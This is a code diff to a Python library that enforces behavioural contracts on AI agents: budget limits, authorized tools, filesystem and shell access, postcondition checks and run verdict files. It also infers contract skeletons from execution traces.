BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"resources.budgets.{e.budget_type}", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + 
self._budget_tracker.record_shell_command() + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_shell_commands", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_cost(self, amount: float) -> None: - """Record cost and check against budget limit.""" try: self._budget_tracker.add_cost(amount) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_cost_usd", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_cost_usd", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_tokens(self, count: int) -> None: - """Record token usage and check against budget limit.""" try: self._budget_tracker.add_tokens(count) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_tokens", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_tokens", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Output validation --- def validate_output(self, output_data: Any) -> List[str]: - """Validate output against the contract's output schema.""" if self._contract.output_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.output_schema) errors = [e.message 
for e in validator.iter_errors(output_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="outputs.schema", + self._warnings.append(f"Output validation warnings: {errors}") + self._record_warn_event( + clause="outputs.schema", evidence={"errors": errors}, - severity="major", - enforcement="warned", ) return errors - # --- Postcondition evaluation --- - - def evaluate_postconditions(self, output: Any) -> List[PostconditionResult]: - """Evaluate all postconditions against the output.""" - - def on_warn(pc: Any, o: Any) -> None: - msg = f"Postcondition '{pc.name}' failed (sync_warn)" - self._warnings.append(msg) - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"contract.postconditions.{pc.name}", - evidence={"check": pc.check, "output_type": str(type(o).__name__)}, - severity=pc.severity, - enforcement="warned", + def evaluate_postconditions( + self, + output: Any, + *, + extra_context: Optional[Dict[str, Any]] = None, + ) -> List[PostconditionResult]: + self._last_output = output + self._last_extra_context = extra_context + merged_context: Dict[str, Any] = {"checks": self._check_context()} + if extra_context: + merged_context.update(extra_context) + + def on_warn(postcondition: Any, _: Any) -> None: + message = f"Postcondition '{postcondition.name}' failed (sync_warn)" + self._warnings.append(message) + self._record_warn_event( + clause=f"contract.postconditions.{postcondition.name}", + evidence={ + "check": postcondition.check, + "checks": self._check_context(), + }, + severity=postcondition.severity, ) - return evaluate_postconditions( - self._contract.postconditions, output, on_warn=on_warn - ) + results: List[PostconditionResult] + try: + results = evaluate_postconditions( + self._contract.postconditions, + output, + extra_context=merged_context, + 
on_warn=on_warn, + ) + except PostconditionError as exc: + self._postconditions_evaluated = True + self._postcondition_failure = exc + self._record_failed_event( + clause=f"contract.postconditions.{exc.postcondition.name}", + evidence={ + "check": exc.postcondition.check, + "checks": self._check_context(), + "output_type": type(output).__name__, + }, + severity=exc.postcondition.severity, + ) + raise + self._postconditions_evaluated = True + return results - # --- Duration check --- + def record_check( + self, + name: str, + status: CheckStatus, + *, + exit_code: Optional[int] = None, + detail: Optional[str] = None, + required: bool = True, + evidence: Optional[Dict[str, Any]] = None, + ) -> RunCheckResult: + allowed: List[str] = ["pass", "warn", "fail", "blocked", "skipped"] + if status not in allowed: + raise ValueError(f"Unsupported check status: {status}") + result = RunCheckResult( + name=name, + status=status, + required=required, + exit_code=exit_code, + detail=detail, + evidence=evidence or {}, + ) + self._checks[name] = result + if status == "warn": + self._warnings.append(f"Check '{name}' reported warning") + return result def check_duration(self) -> None: - """Check elapsed time against budget limit.""" try: self._budget_tracker.check_duration() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_duration_seconds", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_duration_seconds", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - # --- Context manager --- + def _default_artifact_path(self) -> str: + return ".agent-contracts/runs/{run_id}/verdict.json" + + def 
_resolved_artifact_path(self, artifact_path: Optional[Union[str, Path]]) -> Path: + raw = ( + str(artifact_path) + if artifact_path is not None + else ( + self._contract.observability.run_artifact_path + if self._contract.observability and self._contract.observability.run_artifact_path + else self._default_artifact_path() + ) + ) + formatted = raw.format(run_id=self._run_id) + path = Path(formatted) + if not path.is_absolute(): + path = self._repo_root / path + return path.resolve() + + def _snapshot_budgets(self) -> Dict[str, Any]: + snapshot: BudgetSnapshot = self._budget_tracker.snapshot() + return { + "cost_usd": snapshot.cost_usd, + "tokens": snapshot.tokens, + "tool_calls": snapshot.tool_calls, + "shell_commands": snapshot.shell_commands, + "duration_seconds": snapshot.elapsed_seconds, + } + + def finalize_run( + self, + *, + output: Any = None, + extra_context: Optional[Dict[str, Any]] = None, + artifact_path: Optional[Union[str, Path]] = None, + execution_error: Optional[BaseException] = None, + ) -> RunVerdict: + if self._finalized_verdict is not None and artifact_path is None: + return self._finalized_verdict + + if isinstance(execution_error, PostconditionError) and self._postcondition_failure is None: + self._postcondition_failure = execution_error + self._record_failed_event( + clause=f"contract.postconditions.{execution_error.postcondition.name}", + evidence={"check": execution_error.postcondition.check}, + severity=execution_error.postcondition.severity, + ) + if isinstance(execution_error, ContractViolation): + self._blocked = True + + candidate_output = self._last_output if output is None else output + if candidate_output is not None and not self._postconditions_evaluated: + try: + self.evaluate_postconditions(candidate_output, extra_context=extra_context) + except PostconditionError: + pass + + required_check_failure = any( + check.required and check.status in {"fail", "blocked"} + for check in self._checks.values() + ) + warning_present = 
any(check.status == "warn" for check in self._checks.values()) or bool( + self._warnings + ) + unexpected_error = ( + execution_error is not None + and not isinstance(execution_error, (ContractViolation, PostconditionError)) + ) + + if self._blocked: + outcome: Literal["pass", "warn", "blocked", "fail"] = "blocked" + final_gate: Literal["allowed", "blocked", "failed"] = "blocked" + elif self._postcondition_failure is not None or required_check_failure or unexpected_error: + outcome = "fail" + final_gate = "failed" + elif warning_present: + outcome = "warn" + final_gate = "allowed" + else: + outcome = "pass" + final_gate = "allowed" + + self._artifact_path = self._resolved_artifact_path(artifact_path) + timestamp = datetime.now(timezone.utc).isoformat() + contract_path = self._contract.source_path + artifacts: Dict[str, Any] = {"verdict_path": str(self._artifact_path)} + if contract_path is not None: + artifacts["contract_path"] = contract_path + + verdict = RunVerdict( + run_id=self._run_id, + contract={ + "name": self._contract.identity.name, + "version": self._contract.identity.version, + "spec_version": self._contract.spec_version, + }, + host={"name": self._host_name, "version": self._host_version}, + outcome=outcome, + final_gate=final_gate, + violations=[event.to_dict() for event in self.violations], + checks=self.checks, + budgets=self._snapshot_budgets(), + artifacts=artifacts, + timestamp=timestamp, + warnings=self.warnings, + ) + verdict.write_json(self._artifact_path) + self._finalized_verdict = verdict + return verdict def __enter__(self) -> "ContractEnforcer": return self def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None: - pass + if self._finalized_verdict is None: + self.finalize_run(execution_error=exc_val) def enforce_contract( @@ -265,14 +618,7 @@ def enforce_contract( violation_destination: str = "stdout", strict: bool = True, ) -> Callable[[F], F]: - """Decorator that wraps a function with contract enforcement. 
- - The decorated function receives a `_enforcer` keyword argument - providing the ContractEnforcer instance for tool call checks. - - Input validation runs before the function. - Output validation and postconditions run after. - """ + """Decorator that wraps a function with contract enforcement.""" contract = load_contract(source, strict=strict) def decorator(fn: F) -> F: @@ -281,37 +627,34 @@ def wrapper(*args: Any, **kwargs: Any) -> Any: enforcer = ContractEnforcer( contract, violation_destination=violation_destination ) - # Only inject _enforcer if the function accepts it sig = inspect.signature(fn) if "_enforcer" in sig.parameters or any( - p.kind == inspect.Parameter.VAR_KEYWORD for p in sig.parameters.values() + param.kind == inspect.Parameter.VAR_KEYWORD + for param in sig.parameters.values() ): kwargs["_enforcer"] = enforcer - # Pre: validate input if first positional arg is present - if args and contract.input_schema is not None: - errors = enforcer.validate_input(args[0]) - if errors: - raise ContractViolation( - f"Input validation failed: {errors}" - ) - - # Pre: evaluate preconditions - if args and contract.preconditions: - enforcer.check_preconditions(args[0]) + try: + if args and contract.input_schema is not None: + errors = enforcer.validate_input(args[0]) + if errors: + enforcer._blocked = True + raise ContractViolation(f"Input validation failed: {errors}") - result = fn(*args, **kwargs) + if args and contract.preconditions: + enforcer.check_preconditions(args[0]) - # Post: validate output - if contract.output_schema is not None: - errors = enforcer.validate_output(result) - if errors: - enforcer._warnings.append(f"Output validation warnings: {errors}") + result = fn(*args, **kwargs) - # Post: evaluate postconditions - enforcer.evaluate_postconditions(result) + if contract.output_schema is not None: + enforcer.validate_output(result) - return result + enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) + return result + 
except Exception as exc: + enforcer.finalize_run(execution_error=exc) + raise return wrapper # type: ignore[return-value] diff --git a/src/agent_contracts/init_from_trace.py b/src/agent_contracts/init_from_trace.py index 7d55da6..077f9fd 100644 --- a/src/agent_contracts/init_from_trace.py +++ b/src/agent_contracts/init_from_trace.py @@ -1,58 +1,168 @@ -"""Generate contract skeletons from execution traces. -Reads JSONL trace files and infers: -- Identity from agent metadata -- Tool allowlist from observed tool calls -- Budget estimates from observed resource usage -- Postcondition candidates from output patterns -""" +"""Generate coding-agent contract skeletons from execution traces.""" from __future__ import annotations import json -from pathlib import Path -from typing import Any, Dict, List, Optional, Set, Union +from pathlib import Path, PurePosixPath +from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union, cast import yaml def _read_traces(source: Union[str, Path]) -> List[Dict[str, Any]]: - """Read JSONL trace file, returning list of trace entries.""" path = Path(source) traces: List[Dict[str, Any]] = [] - with open(path, encoding="utf-8") as f: - for _line_num, line in enumerate(f, 1): + with open(path, encoding="utf-8") as handle: + for line in handle: line = line.strip() if not line: continue try: - traces.append(json.loads(line)) + payload = json.loads(line) except json.JSONDecodeError: - pass # Skip malformed lines + continue + if isinstance(payload, dict): + traces.append(payload) return traces +def _iter_events(trace: Dict[str, Any]) -> Iterable[Dict[str, Any]]: + yield trace + events = trace.get("events", []) + if isinstance(events, list): + for event in events: + if isinstance(event, dict): + yield event + + def _extract_tools(traces: List[Dict[str, Any]]) -> List[str]: - """Extract unique tool names from traces.""" tools: Set[str] = set() for trace in traces: - # Support various trace formats - if "tool_calls" in trace: - for tc in 
trace["tool_calls"]: - name = tc.get("name") or tc.get("tool") or tc.get("function", {}).get("name") + for entry in _iter_events(trace): + tool_calls = entry.get("tool_calls", []) + if isinstance(tool_calls, list): + for tool_call in tool_calls: + if isinstance(tool_call, dict): + name = tool_call.get("name") or tool_call.get("tool") + if name: + tools.add(str(name)) + if entry.get("type") == "tool_call": + name = entry.get("name") or entry.get("tool_name") if name: - tools.add(name) - if "tool" in trace and "name" in trace: - tools.add(trace["name"]) - if "type" in trace and trace["type"] == "tool_call": - name = trace.get("name") or trace.get("tool_name") - if name: - tools.add(name) + tools.add(str(name)) return sorted(tools) -def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: - """Estimate budget limits from observed resource usage (with 20% headroom).""" +def _extract_network(traces: List[Dict[str, Any]]) -> List[str]: + urls: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + for key in ("url", "endpoint"): + value = entry.get(key) + if isinstance(value, str) and value.startswith(("http://", "https://")): + urls.add(value) + requests = entry.get("network_requests", []) + if isinstance(requests, list): + for request in requests: + if isinstance(request, dict): + url = request.get("url") + if isinstance(url, str): + urls.add(url) + return sorted(urls) + + +def _normalize_path(path: str) -> Optional[str]: + candidate = path.strip() + if not candidate: + return None + posix = PurePosixPath(candidate.lstrip("./")) + if str(posix) == ".": + return None + return posix.as_posix() + + +def _infer_globs(paths: Set[str]) -> List[str]: + patterns: Set[str] = set() + for path in paths: + normalized = _normalize_path(path) + if normalized is None: + continue + parts = PurePosixPath(normalized).parts + if len(parts) <= 1: + patterns.add(normalized) + else: + patterns.add(f"{parts[0]}/**") + return sorted(patterns) + + +def 
_extract_filesystem(traces: List[Dict[str, Any]]) -> Dict[str, List[str]]: + read_paths: Set[str] = set() + write_paths: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + filesystem = entry.get("filesystem") + if isinstance(filesystem, dict): + for value in filesystem.get("read", []): + if isinstance(value, str): + read_paths.add(value) + for value in filesystem.get("write", []): + if isinstance(value, str): + write_paths.add(value) + for key in ("file_reads", "files_read", "read_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + read_paths.add(value) + for key in ("file_writes", "files_written", "write_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + write_paths.add(value) + event_type = entry.get("type") + path_value = entry.get("path") + if isinstance(path_value, str): + if event_type in {"file_read", "filesystem.read"}: + read_paths.add(path_value) + if event_type in {"file_write", "filesystem.write"}: + write_paths.add(path_value) + result: Dict[str, List[str]] = {} + read_globs = _infer_globs(read_paths) + write_globs = _infer_globs(write_paths) + if read_globs: + result["read"] = read_globs + if write_globs: + result["write"] = write_globs + return result + + +def _extract_shell_commands(traces: List[Dict[str, Any]]) -> Tuple[List[str], int]: + commands: Set[str] = set() + max_count = 0 + for trace in traces: + count = 0 + for entry in _iter_events(trace): + values = entry.get("shell_commands", []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + commands.add(" ".join(value.strip().split())) + count += 1 + elif isinstance(value, dict) and isinstance(value.get("command"), str): + commands.add(" ".join(value["command"].strip().split())) + count += 1 + event_type = entry.get("type") + command = entry.get("command") + if event_type in {"shell", 
"shell_command", "command"} and isinstance(command, str): + commands.add(" ".join(command.strip().split())) + count += 1 + max_count = max(max_count, count) + return sorted(commands), max_count + + +def _extract_budgets(traces: List[Dict[str, Any]], max_shell_commands: int) -> Dict[str, Any]: max_cost = 0.0 max_tokens = 0 max_tool_calls = 0 @@ -64,11 +174,10 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: tokens = usage.get("total_tokens", 0) or trace.get("total_tokens", 0) tool_calls = len(trace.get("tool_calls", [])) duration = trace.get("duration_seconds", 0) or (trace.get("latency_ms") or 0) / 1000 - - max_cost = max(max_cost, cost) - max_tokens = max(max_tokens, tokens) - max_tool_calls = max(max_tool_calls, tool_calls) - max_duration = max(max_duration, duration) + max_cost = max(max_cost, float(cost or 0)) + max_tokens = max(max_tokens, int(tokens or 0)) + max_tool_calls = max(max_tool_calls, int(tool_calls)) + max_duration = max(max_duration, float(duration or 0)) budgets: Dict[str, Any] = {} if max_cost > 0: @@ -79,23 +188,22 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: budgets["max_tool_calls"] = int(max_tool_calls * 1.2) + 1 if max_duration > 0: budgets["max_duration_seconds"] = round(max_duration * 1.2, 1) - + if max_shell_commands > 0: + budgets["max_shell_commands"] = int(max_shell_commands * 1.2) + 1 return budgets def _extract_identity(traces: List[Dict[str, Any]]) -> Dict[str, str]: - """Extract agent identity from traces.""" for trace in traces: agent = trace.get("agent", {}) if isinstance(agent, dict): name = agent.get("name") version = agent.get("version") if name: - return {"name": name, "version": version or "0.1.0"} + return {"name": str(name), "version": str(version or "0.1.0")} agent_name = trace.get("agent_name") or trace.get("agent_id") if agent_name: - return {"name": agent_name, "version": "0.1.0"} - + return {"name": str(agent_name), "version": "0.1.0"} return {"name": 
"unnamed-agent", "version": "0.1.0"} @@ -105,12 +213,7 @@ def generate_contract_from_traces( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> Dict[str, Any]: - """Generate a contract skeleton from execution traces. - - Returns a dict ready to be serialized as YAML. - """ traces = _read_traces(source) - identity = _extract_identity(traces) if agent_name: identity["name"] = agent_name @@ -118,7 +221,10 @@ def generate_contract_from_traces( identity["version"] = agent_version tools = _extract_tools(traces) - budgets = _extract_budgets(traces) + network = _extract_network(traces) + filesystem = _extract_filesystem(traces) + shell_commands, max_shell_commands = _extract_shell_commands(traces) + budgets = _extract_budgets(traces, max_shell_commands) contract: Dict[str, Any] = { "agent_contract": "0.1.0", @@ -134,21 +240,23 @@ def generate_contract_from_traces( } ] }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, } - # Tier 1 fields (if we have data) - if tools: - contract["effects"] = { - "authorized": { - "tools": tools, - "network": [], - "state_writes": [], - } - } - + authorized: Dict[str, Any] = { + "tools": tools, + "network": network, + "state_writes": [], + } + if filesystem: + authorized["filesystem"] = filesystem + if shell_commands: + authorized["shell"] = {"commands": shell_commands} + contract["effects"] = {"authorized": authorized} if budgets: contract["resources"] = {"budgets": budgets} - return contract @@ -158,8 +266,7 @@ def generate_contract_yaml( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> str: - """Generate a contract YAML string from execution traces.""" data = generate_contract_from_traces( source, agent_name=agent_name, agent_version=agent_version ) - return yaml.dump(data, sort_keys=False, default_flow_style=False) + return cast(str, yaml.dump(data, sort_keys=False, default_flow_style=False)) diff --git a/src/agent_contracts/loader.py 
b/src/agent_contracts/loader.py index 834162e..73c0bc9 100644 --- a/src/agent_contracts/loader.py +++ b/src/agent_contracts/loader.py @@ -20,6 +20,7 @@ EffectsDeclared, ErrorDef, FailureModel, + FilesystemAuthorization, LatencySLO, MetricDef, ObservabilityConfig, @@ -27,6 +28,7 @@ PostconditionSLO, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, SubstitutionConfig, TracesConfig, @@ -81,10 +83,25 @@ def _build_postcondition(raw: Dict[str, Any]) -> PostconditionDef: def _build_effects_authorized(raw: Dict[str, Any]) -> EffectsAuthorized: + filesystem_raw = raw.get("filesystem") + filesystem = None + if isinstance(filesystem_raw, dict): + filesystem = FilesystemAuthorization( + read=filesystem_raw.get("read", []), + write=filesystem_raw.get("write", []), + ) + + shell_raw = raw.get("shell") + shell = None + if isinstance(shell_raw, dict): + shell = ShellAuthorization(commands=shell_raw.get("commands", [])) + return EffectsAuthorized( tools=raw.get("tools", []), network=raw.get("network", []), state_writes=raw.get("state_writes", []), + filesystem=filesystem, + shell=shell, ) @@ -103,6 +120,7 @@ def _build_budgets(raw: Dict[str, Any]) -> ResourceBudgets: max_tokens=budgets.get("max_tokens"), max_tool_calls=budgets.get("max_tool_calls"), max_duration_seconds=budgets.get("max_duration_seconds"), + max_shell_commands=budgets.get("max_shell_commands"), ) @@ -148,7 +166,12 @@ def _build_observability(raw: Dict[str, Any]) -> ObservabilityConfig: ] ve_raw = raw.get("violation_events") ve = ViolationEventsConfig(**ve_raw) if isinstance(ve_raw, dict) else None - return ObservabilityConfig(traces=traces, metrics=metrics, violation_events=ve) + return ObservabilityConfig( + traces=traces, + metrics=metrics, + violation_events=ve, + run_artifact_path=raw.get("run_artifact_path"), + ) def _build_versioning(raw: Dict[str, Any]) -> VersioningConfig: @@ -211,14 +234,15 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: contract_raw = 
data.get("contract", {}) postconditions = [_build_postcondition(p) for p in contract_raw.get("postconditions", [])] - # Tier 1 fields inputs_raw = data.get("inputs") input_schema = inputs_raw.get("schema") if isinstance(inputs_raw, dict) else None preconditions = None if isinstance(inputs_raw, dict) and "preconditions" in inputs_raw: preconditions = [ PreconditionDef( - name=p["name"], check=p["check"], description=p.get("description") + name=p["name"], + check=p["check"], + description=p.get("description"), ) for p in inputs_raw["preconditions"] ] @@ -238,7 +262,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: resources_raw = data.get("resources") budgets = _build_budgets(resources_raw) if isinstance(resources_raw, dict) else None - # Tier 2 fields fm_raw = data.get("failure_model") failure_model = _build_failure_model(fm_raw) if isinstance(fm_raw, dict) else None @@ -270,5 +293,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: observability=observability, versioning=versioning, slo=slo, + source_path=str(Path(source).resolve()), raw=data, ) diff --git a/src/agent_contracts/postconditions.py b/src/agent_contracts/postconditions.py index 48d4a17..2e2ef97 100644 --- a/src/agent_contracts/postconditions.py +++ b/src/agent_contracts/postconditions.py @@ -6,7 +6,8 @@ - async_monitor: queues for asynchronous evaluation Expression evaluator uses a restricted subset — NO eval() or exec(). -Supports basic comparisons, membership tests, and type checks. +Supports basic comparisons, membership tests, length checks, and simple +boolean composition with `and` / `or`. 
""" from __future__ import annotations @@ -18,7 +19,6 @@ from agent_contracts.types import PostconditionDef, PreconditionDef -# Safe operators for expression evaluation _OPERATORS = { "==": operator.eq, "!=": operator.ne, @@ -42,11 +42,6 @@ def __init__(self, postcondition: PostconditionDef, output: Any) -> None: def _resolve_path(obj: Any, path: str) -> Any: - """Resolve a dotted path like 'output.status' against an object or dict. - - Only traverses dicts by key lookup. Does not use getattr to avoid - triggering properties or descriptors on untrusted objects. - """ parts = path.split(".") current = obj for part in parts: @@ -60,7 +55,6 @@ def _resolve_path(obj: Any, path: str) -> Any: def _parse_value(token: str) -> Any: - """Parse a literal value token (string, number, bool, None, list).""" token = token.strip() if token == "None" or token == "null": return None @@ -72,7 +66,6 @@ def _parse_value(token: str) -> Any: return token[1:-1] if token.startswith("'") and token.endswith("'"): return token[1:-1] - # Try list literal: ["a", "b"] if token.startswith("[") and token.endswith("]"): inner = token[1:-1].strip() if not inner: @@ -87,11 +80,10 @@ def _parse_value(token: str) -> Any: return float(token) except ValueError: pass - return token # Treat as identifier path + return token def _split_list_items(s: str) -> List[str]: - """Split comma-separated items, respecting quoted strings.""" items: List[str] = [] current: List[str] = [] in_quote: Optional[str] = None @@ -113,65 +105,94 @@ def _split_list_items(s: str) -> List[str]: return items +def _split_logical(expr: str, operator_token: str) -> List[str]: + parts: List[str] = [] + current: List[str] = [] + depth = 0 + in_quote: Optional[str] = None + i = 0 + while i < len(expr): + ch = expr[i] + if in_quote: + current.append(ch) + if ch == in_quote: + in_quote = None + i += 1 + continue + if ch in ('"', "'"): + in_quote = ch + current.append(ch) + i += 1 + continue + if ch in "([": + depth += 1 + 
current.append(ch) + i += 1 + continue + if ch in ")]": + depth = max(0, depth - 1) + current.append(ch) + i += 1 + continue + if depth == 0 and expr.startswith(operator_token, i): + parts.append("".join(current).strip()) + current = [] + i += len(operator_token) + continue + current.append(ch) + i += 1 + if current: + parts.append("".join(current).strip()) + return parts + + def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: - """Evaluate a CEL-like expression safely against a context dict. - - Supported forms: - - "output is not None" - - "output is None" - - "output.status == \"resolved\"" - - "output.status in [\"resolved\", \"escalated\"]" - - "output.status not in [\"failed\"]" - - "len(output.items) > 0" - - "output.score >= 0.8" - - "true" / "false" - - Returns True if the check passes, False otherwise. - """ check = check.strip() + or_parts = _split_logical(check, " or ") + if len(or_parts) > 1: + return any(evaluate_expression(part, context) for part in or_parts) + + and_parts = _split_logical(check, " and ") + if len(and_parts) > 1: + return all(evaluate_expression(part, context) for part in and_parts) + if check in ("true", "True"): return True if check in ("false", "False"): return False - # "X is not None" - m = re.match(r"^(\S+)\s+is\s+not\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+not\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is not None - # "X is None" - m = re.match(r"^(\S+)\s+is\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is None - # "X not in [...]" - m = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) + if match: + val = 
_resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val not in allowed - # "X in [...]" - m = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val in allowed - # "len(X) op Y" - m = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) + if match: + val = _resolve_path(context, match.group(1)) if val is None: return False - op_fn = _OPERATORS[m.group(2)] - rhs = _parse_value(m.group(3)) + op_fn = _OPERATORS[match.group(2)] + rhs = _parse_value(match.group(3)) return bool(op_fn(len(val), rhs)) - # "X op Y" (comparison) for op_str in (">=", "<=", "!=", "==", ">", "<"): parts = check.split(op_str, 1) if len(parts) == 2: @@ -189,7 +210,6 @@ def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: except TypeError: return False - # Fallback: treat as a path and check truthiness val = _resolve_path(context, check) return bool(val) @@ -219,13 +239,6 @@ def evaluate_preconditions( *, raise_on_failure: bool = True, ) -> List[PreconditionResult]: - """Evaluate all preconditions against input data. - - Preconditions use the same expression evaluator as postconditions. - Context key is 'input' instead of 'output'. - - If raise_on_failure is True, raises PreconditionError on first failure. - """ context: Dict[str, Any] = {"input": input_data} results: List[PreconditionResult] = [] @@ -255,14 +268,6 @@ def evaluate_postconditions( on_warn: Optional[Callable[[PostconditionDef, Any], None]] = None, on_async: Optional[Callable[[PostconditionDef, Any], None]] = None, ) -> List[PostconditionResult]: - """Evaluate all postconditions against an output. 
- - - sync_block: raises PostconditionError on failure - - sync_warn: calls on_warn callback on failure - - async_monitor: calls on_async callback (deferred evaluation) - - Returns list of results for all evaluated postconditions. - """ context: Dict[str, Any] = {"output": output} if extra_context: context.update(extra_context) @@ -273,21 +278,26 @@ def evaluate_postconditions( if pc.enforcement == "async_monitor": if on_async: on_async(pc, output) - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor")) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor") + ) continue - # Skip eval:judge checks — they require external LLM call if pc.check.startswith("eval:"): - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement) + ) continue passed = evaluate_expression(pc.check, context) - results.append(PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement) + ) if not passed: if pc.enforcement == "sync_block": raise PostconditionError(pc, output) - elif pc.enforcement == "sync_warn" and on_warn: + if pc.enforcement == "sync_warn" and on_warn: on_warn(pc, output) return results diff --git a/src/agent_contracts/schemas/agent-contract.schema.json b/src/agent_contracts/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/src/agent_contracts/schemas/agent-contract.schema.json +++ b/src/agent_contracts/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. 
Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." 
